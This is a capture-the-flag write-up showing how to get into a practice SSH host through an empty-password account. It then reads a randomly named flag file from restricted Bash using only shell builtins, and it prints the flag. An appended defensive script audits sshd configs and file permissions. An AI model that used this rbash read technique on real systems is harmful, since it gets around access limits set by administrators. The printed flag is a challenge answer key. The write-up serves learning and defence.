Restricted
We are given a remote instance to connect to:
$ nc 64.227.41.83 30543
SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1
Invalid SSH identification string.
Ncat: Broken pipe.
It looks like we must access via SSH.
SSH connection
We are also given some files:
$ tree
.
├── Dockerfile
├── build_docker.sh
└── src
    ├── bash_profile
    ├── flag.txt
    └── sshd_config
2 directories, 5 files
Looking at the Dockerfile, we see that the user is named restricted and that we will be using rbash (restricted Bash):
FROM debian:latest
RUN apt update -y && apt upgrade -y && apt install openssh-server procps -y
RUN adduser --disabled-password restricted
RUN usermod --shell /bin/rbash restricted
RUN sed -i -re 's/^restricted:[^:]+:/restricted::/' /etc/passwd /etc/shadow
RUN mkdir /home/restricted/.bin
RUN chown -R restricted:restricted /home/restricted
RUN ln -s /usr/bin/top /home/restricted/.bin
RUN ln -s /usr/bin/uptime /home/restricted/.bin
RUN ln -s /usr/bin/ssh /home/restricted/.bin
COPY src/sshd_config /etc/ssh/sshd_config
COPY src/flag.txt /flag.txt
COPY src/bash_profile /home/restricted/.bash_profile
RUN chown root:root /home/restricted/.bash_profile
RUN chmod 755 /home/restricted/.bash_profile
RUN chmod 755 /flag.txt
RUN mv /flag.txt /flag_`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1`
RUN ssh-keygen -A
RUN mkdir -p /run/sshd
EXPOSE 1337
ENTRYPOINT ["/usr/sbin/sshd", "-D", "-o", "ListenAddress=0.0.0.0", "-p", "1337"]
Also, an empty password is allowed in the SSH configuration (src/sshd_config):
$ cat src/sshd_config | grep -vE '^#|^$'
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
Match user restricted
PermitEmptyPasswords yes
So, let’s get access:
$ ssh restricted@64.227.41.83 -p 30543
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$
Basic reconnaissance
Using some simple commands, we see that we don’t have many commands available:
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ whoami
-rbash: whoami: command not found
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ id
-rbash: id: command not found
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ ls
-rbash: ls: command not found
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ cat
-rbash: cat: command not found
We confirm that we are inside a restricted Bash.
Built-in commands
However, we can still use built-in commands like echo, read or printf, as well as loops and conditional statements (while, for, if-else…).
In this challenge we must read the flag using these built-in commands (more information at HackTricks).
The way I solved the challenge was using this Bash sentence:
while read line; do echo $line; done < /flag*
This makes Bash read lines from a file until it reaches EOF (end-of-file) and print each one using echo. The < redirects the file to the standard input of the loop, so that read takes its lines from that file. Finally, we need to add the wildcard /flag* because the flag filename is randomized when the Docker container starts (it is shown in the Dockerfile).
Flag
And there’s the flag:
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ while read line; do echo $line; done < /flag*
HTB{r35tr1ct10n5_4r3_p0w3r1355}
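
The two conditions this solution depends on, an account that accepts an empty password and a flag file readable by every user, can be checked from the defender's side. The following is an added example, not part of the original write-up; the function names and the sample files are constructed for illustration.

```bash
# Added example: audit checks for the two weaknesses used in this write-up.
# Function names and sample files are constructed for illustration.

# Report every "PermitEmptyPasswords yes" together with the scope it applies to
# ("global" or the enclosing Match block). Include files are not followed.
audit_empty_passwords() (
    scope="global"
    while read -r key value rest; do
        key=$(printf '%s' "$key" | tr 'A-Z' 'a-z')   # keywords are case-insensitive
        case "$key" in
            match) scope="Match $value${rest:+ $rest}" ;;
            permitemptypasswords)
                case "$value" in
                    [Yy][Ee][Ss]) echo "$scope: PermitEmptyPasswords yes" ;;
                esac ;;
        esac
    done < "$1"
)

# List regular files under a directory that any local account can read.
# rbash limits which commands run, not which files can be opened, so the
# read builtin can print every file listed here.
world_readable() {
    find "$1" -type f -perm -004 -print 2>/dev/null | sort
}

# Constructed sample mirroring the sshd_config excerpt and the chmod 755 flag file.
sample=$(mktemp -d)
mkdir "$sample/rootfs"
cat > "$sample/sshd_config" <<'EOF'
UsePAM yes
X11Forwarding yes
#PermitEmptyPasswords no
Match user restricted
PermitEmptyPasswords yes
EOF
: > "$sample/rootfs/flag_AbC12"; chmod 755 "$sample/rootfs/flag_AbC12"  # mode from the Dockerfile
: > "$sample/rootfs/flag_fixed"; chmod 600 "$sample/rootfs/flag_fixed"  # owner-only alternative

audit_empty_passwords "$sample/sshd_config"
world_readable "$sample/rootfs"
```

Only the file with mode 755 is reported; with an owner-only mode and a different owner, the read loop from the restricted account would fail with a permission error.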